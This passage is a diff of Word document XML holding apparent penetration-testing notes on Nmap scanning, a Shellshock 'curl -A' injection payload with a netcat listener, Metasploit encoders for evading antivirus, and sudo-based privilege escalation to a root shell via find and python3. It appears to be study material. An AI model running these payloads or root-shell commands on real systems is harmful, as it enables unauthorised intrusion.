+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>port ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-v [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>verbose ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1804,8 +1936,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> [ very verbose ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> [ very </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>verbose ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -1859,7 +1996,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
+        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( https://nmap.org</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ) at 2022-02-05 11:46 IST</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1892,7 +2037,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> open  http-proxy</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>open  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-proxy</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1946,8 +2099,13 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>--reason [ reason of port/service state ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">--reason [ reason of port/service </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>state ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1988,7 +2146,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
+        <w:t>-mac-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>prefixes :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Contain MAC prefix to detect manufacturer</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2000,9 +2166,14 @@
       <w:r>
         <w:t>-protocols</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
+        <w:t xml:space="preserve">  :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Contain protocol and port related info</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2076,8 +2247,13 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>2) SYN Scan: [ Half Open Scan ]</w:t>
-      </w:r>
+        <w:t xml:space="preserve">2) SYN Scan: [ Half Open </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Scan ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2177,22 +2353,45 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t># cd /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>usr</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>/share/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>/scripts/</w:t>
       </w:r>
     </w:p>
@@ -2203,19 +2402,38 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sSV</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> --script=rdp-vuln-ms12-020 target </w:t>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --script=rdp-vuln-ms12-020 target</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2225,19 +2443,38 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sSVC</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> target </w:t>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2263,18 +2500,34 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sSV</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> --script vuln target</w:t>
       </w:r>
     </w:p>
@@ -2284,18 +2537,34 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>nmap</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sSV</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> --script exploit target</w:t>
       </w:r>
     </w:p>
@@ -2325,7 +2594,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Type: RCE [ Remote Code Execution ] Remote</w:t>
+        <w:t xml:space="preserve">Type: RCE [ Remote Code </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Execution ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Remote</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2333,10 +2610,12 @@
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>cgi</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>-bin/status</w:t>
       </w:r>
@@ -2684,13 +2963,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
+        <w:t xml:space="preserve">we took access through vulnerable web and start </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">listening  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>netcat</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> on </w:t>
       </w:r>
@@ -2715,7 +2999,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
+        <w:t xml:space="preserve">curl -A '() </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>{ :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>; }; echo; /bin/bash -c "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2771,8 +3071,13 @@
         <w:t>nd</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> terminal :</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>terminal :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3140,7 +3445,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>2. Main Components::Modules</w:t>
+        <w:t xml:space="preserve">2. Main </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Components::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Modules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3194,7 +3507,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
+        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Thus</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3490,10 +3811,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Y</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ou can conduct searches using CVE numbers, exploit names (</w:t>
+        <w:t>You can conduct searches using CVE numbers, exploit names (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3559,6 +3877,377 @@
     <w:p>
       <w:r>
         <w:t>Once you have set a parameter, you can use the show options command to check the value was set correctly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Privilege Escalation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>``````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The goal is to increase the level of access on a system. There are a wide range of privilege escalation techniques.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Techniques Used for Privilege Escalation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Kernel Exploits</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting Services Which are Running as Root</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting SUID Executables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting SUDO Rights</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Exploiting Badly Configured Cron Jobs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Exploiting Users With </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in their PATH</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>and many more...</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Step-by-Step Guide</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1. Check Sudo Permissions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">See what commands you can run with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> without password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># Example </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>output:#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> User </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>user</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> may run the following commands on host:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">#  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>root) NOPASSWD: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/bin/find</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">#  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>root) NOPASSWD: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>2. Exploit Sudo Commands</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Use allowed </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> commands to get a root shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># If you can run bash directly:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># You're now root!</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t># If you can run find:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> find / -exec /bin/bash \;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># If you can run python3:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> python3 -c 'import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>os.system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>("/bin/bash")'</w:t>
       </w:r>
     </w:p>
     <w:p/>

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -37,13 +37,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>X.X.X.X ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[ X.X.X.X ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -55,13 +50,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ 80/TCP -STATE- </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>HTTP ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[ 80/TCP -STATE- HTTP ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -227,21 +217,8 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> echo [ICMP/IGMP</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>] :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ping</w:t>
+      <w:r>
+        <w:t>7 : echo [ICMP/IGMP] : ping</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -285,37 +262,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SYN,ACK</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RST,PSH</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>FIN,URG</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>SYN,ACK,RST,PSH,FIN,URG</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3 way</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> handshake</w:t>
+      <w:r>
+        <w:t>3 way handshake</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1162,15 +1116,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MAC Address: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>84:A9:3E</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:8A:7E:37 (Hewlett Packard)</w:t>
+        <w:t>MAC Address: 84:A9:3E:8A:7E:37 (Hewlett Packard)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1230,33 +1176,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">1) TCP Scan: [ Full Open </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SYN ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> SYN+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ACK ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ACK)</w:t>
+        <w:t>1) TCP Scan: [ Full Open Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (SYN ; SYN+ACK ; ACK)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1330,27 +1255,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>T  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>TCP Scan]</w:t>
+      <w:r>
+        <w:t>T  [TCP Scan]</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">NOTE: By </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>default</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> NMAP scan 1000 ports as result.</w:t>
+        <w:t>NOTE: By default NMAP scan 1000 ports as result.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1400,15 +1312,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Port:[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-p]</w:t>
+        <w:t>+ Port:[-p]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1632,23 +1536,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p U:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>53,T</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>21-25,80</w:t>
+        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1888,43 +1776,23 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">-s [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-T [ TCP </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-p [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>port ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-v [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>verbose ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>-s [ Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-T [ TCP Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-p [ port ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-v [ verbose ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1936,13 +1804,8 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> [ very </w:t>
-      </w:r>
